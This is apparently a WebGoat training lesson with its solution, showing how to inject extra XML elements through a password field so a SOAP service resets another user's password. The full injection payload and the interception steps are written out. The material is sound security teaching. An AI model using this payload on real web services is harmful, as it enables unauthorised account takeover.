Lesson Plan Title: How to Perform Web Service SAX Injection

 

Concept / Topic To Teach:

Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.

 

General Goal(s):

Some web interfaces make use of Web Services in the background. If the frontend relies on the web service for all input validation, it may be possible to corrupt the XML that the web interface sends.

In this exercise, try to change the password for a user other than 101.

 

 

 

Solution:

 

To succeed this lesson it is required to reset the password of the user with a different user-ID then 101 (which is your user-ID)

.

When you fill out a password and click on "Go!" the following XML request will be created, submit and parsed by the SAX parser:

 

<?xml version='1.0' encoding='UTF-8'?>
<wsns0:Envelope
  xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
  xmlns:xsd='http://www.w3.org/2001/XMLSchema'
  xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'
  xmlns:wsns1='http://lessons.webgoat.owasp.org'>
  <wsns0:Body>
    <wsns1:changePassword>
      <id xsi:type='xsd:int'>101</id>
      <password xsi:type='xsd:string'>[password]</password>
    </wsns1:changePassword>
  </wsns0:Body>
</wsns0:Envelope>

 

SAX parsers will parse anything that is well-formed, meaning that there are matching end and close tags and that the schema is correct. When you are able to add a new changePAssword element with corresponding id tag and password tag, the SAX parser will be more than happy to change the password for the user-ID provided.

So you need to have something like this as a final result:

 

<?xml version='1.0' encoding='UTF-8'?>

<wsns0:Envelope

  xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'

  xmlns:xsd='http://www.w3.org/2001/XMLSchema'

  xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'

  xmlns:wsns1='http://lessons.webgoat.owasp.org'>

  <wsns0:Body>

    <wsns1:changePassword>

      <id xsi:type='xsd:int'>101</id>

      <password xsi:type='xsd:string'>[password]</password>

    </wsns1:changePassword>

    <wsns1:changePassword>

      <id xsi:type='xsd:int'>102</id>

      <password xsi:type='xsd:string'>notforyoutoknow</password>

    </wsns1:changePassword>

  </wsns0:Body>

</wsns0:Envelope>

 

This requires to inject:

newpassword</password>

    </wsns1:changePassword>

    <wsns1:changePassword>

      <id xsi:type='xsd:int'>102</id>

      <password xsi:type='xsd:string'>notforyoutoknow

 

There are field-limitations in the HTML input field, so it is required to intercept the HTTP Request with WebScarab and replace the parameter password with the payload.

 

Enter a password 'test' and click "Go!".

Figure 113 Reset password with test

 

Intercept the request in WebScarab and replace the string test with the payload.

 

Figure 114 Intercept request

 

Figure 115 Inject XML payload

 

Figure 116 Lesson completed

 

 

Solution by Erwin Geirnaert ZION SECURITY